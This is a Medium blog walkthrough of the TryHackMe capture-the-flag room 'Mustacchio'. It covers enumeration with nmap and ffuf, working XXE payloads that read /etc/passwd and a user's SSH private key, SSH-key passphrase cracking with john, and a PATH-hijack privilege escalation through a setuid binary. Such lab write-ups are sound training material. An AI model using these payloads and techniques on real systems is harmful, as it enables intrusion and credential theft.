Mustacchio — TryHackMe

https://tryhackme.com/room/mustacchio

Summary

Another easy boot2root room. We first needed to enumerate a bit to find out what is running and then doing directory Brute forcing to find a sqlite3 db dump, which gave us the admin password.Then using that password we logged in to the admin portal where there was a XXE vulnerability which was exploited to give us the user’s SSH encrypted key which was cracked with ssh2john. Privesc involved exploiting a suid binary.

This room is available here: https://tryhackme.com/room/mustacchio

So as usual let’s start enumerating the machine with nmap:

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.202.187

PORT     STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-https

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8765 10.10.202.187

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login

So, we have SSH port open and 2 web server ports open. Let’s use FFUF to check if any useful directory is exposed:

FFUF

# Perform directory brute forcing using ffuf
⇒ ffuf -u http://10.10.202.187/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

        /'___\  /'___\           /'___\       
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.202.187/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
custom [Status: 301, Size: 315, Words: 20, Lines: 10]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
[Status: 200, Size: 1752, Words: 77, Lines: 73]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 1957 req/sec :: Duration: [0:02:17] :: Errors: 0 ::

We can see a directory called “custom” is there. Let’s explore it:

custom dir

Users.bak

Users.bak looks to be a database dump:

user.bak

Explore it using sqlitebroswer and it gives us a user ‘admin’ and a hashed password:

sqlitebrowser

The hash is easily cracked at https://crackstation.net/ :

crackstation

Admin Portal

There was one more web port open which nmap had told use earlier. Accessing that at port 8765 gives us a admin login portal:

admin portal

Using the admin user and password found above, we are able to login. Also just clicking the submit button gives us a pop up — Insert XML code!

admin portal

Also capture this request in Burp Suite:

captured BURP request

Few things are revealed here:

Checking auth/dontforget.bak indeed gave us a n example XML request:

kali@kali:~$ cat /tmp/dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>
</comment>

From this it is pretty clear now that we have XXE vulnerability here and we need to exploit it to get out first flag.

XXE Payload

Found some useful XXE payloads here :

https://github.com/payloadbox/xxe-injection-payload-list

Combining the XML request and the payloads, here is a POC which gave us the password file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
able to read passwd file

So we can use this POC to read the user Barry’s Private SSH key:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>

We got the private key for the user Barry but the key is encrypted. Let’s use ssh2john and john to decrypt the key:

python /opt/tools/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh key decrypted using ssh2john

User Flag

So we now have the SSH key for user Barry along with the passphrase for that SSH key. Change the permission to the SSH keys to 600 and then login using the following command:

ssh using private key

User.txt was in the user Barry’s home dir:

user’s flag

Privilege Escalation

Running Linux Smart Enumeration Script we found an uncommon setuid binary:

lse.sh found setuid binary

This is that binary with setuid bit set and it is owned by root :

binary owned by root

Let’s analyze this binary using strings :

This binary looks to be Ngnix log reader. It is using tail command to read access.log but without the full path. We can exploit that and put in our own “tail” binary and use it to do privilege escalation. First we need to change the PATH variable, so that our binary is executed first:

barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ PATH=/home/barry:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Then let’s make a new file in /home/barry named tail :

barry@mustacchio:~$ cat tail 
/bin/bash
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$

Now execute the suid binary /home/joe/live_log :

root.txt

/bin/bash was executed as root and we got the root shell and then the root flag. Game over!

That’s it for this room. Thanks for reading.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Understanding Maven by creating a simple java project

Micropython on STM32 Nucleo Board in easy steps

Deep Dive: Kubernetes Single Sign-On (SSO) with OpenID Connection via G Suite

Product 102 for Engineers: Decision Making and Strategy

Google empowers its BI Capabilities

Linux Lite — Best Alternative to Windows 7 for Old PC

Chrome Extensions to make your life with css easy

HODL & Earn $TON on Gate.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Smag Grotto — TryHackMe, WriteUp

HTB —Valentine Writeup

SSN -Sharing Security News

HTB — CAP Walkthrough